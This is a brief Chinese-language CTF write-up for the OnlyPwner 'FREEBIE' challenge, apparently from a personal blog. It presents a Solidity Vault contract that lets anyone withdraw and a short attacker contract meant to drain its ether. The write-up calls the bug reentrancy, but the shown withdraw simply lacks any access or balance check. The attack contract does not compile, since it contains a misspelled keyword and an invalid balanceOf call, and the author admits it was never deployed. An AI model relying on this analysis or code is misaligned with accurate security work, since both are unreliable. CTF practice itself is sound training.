CTF-OnlyPwner-FREEBIE

题目地址 点击

要求是将合约的余额变为零

源代码很少

pragma solidity 0.8.19;

import {IVault} from "./interfaces/IVault.sol";

contract Vault is IVault {
    uint256 public totalDeposited;

    function deposit() external payable {
        totalDeposited += msg.value;
        emit Deposit(msg.sender, msg.value);
    }

    function withdraw(uint256 amount) external {
        totalDeposited -= amount;
        payable(msg.sender).transfer(amount);
        emit Withdraw(msg.sender, amount);
    }
}

一看就是一个重入攻击

很简单，所以就直接写攻击合约了,就没有在remix上部署了

//SPDX-License-Identifier: MIT
pragma solidity^0.8.19;

interface Vault{
    function deposit() external payable;
    function withdraw(uint256 amount ) exteranl;
}

contract Hack{
   Vault target;

    constructor (address _target){
        target = Vault(_target);
    }
    
    function pwn() external payable {
        target.withdraw(1 ether);
    }
    receive() external payable {

     if(balanceOf(address(Vault))>balanceOf(address(this)))
        target.withdraw(1 ether);
    }
}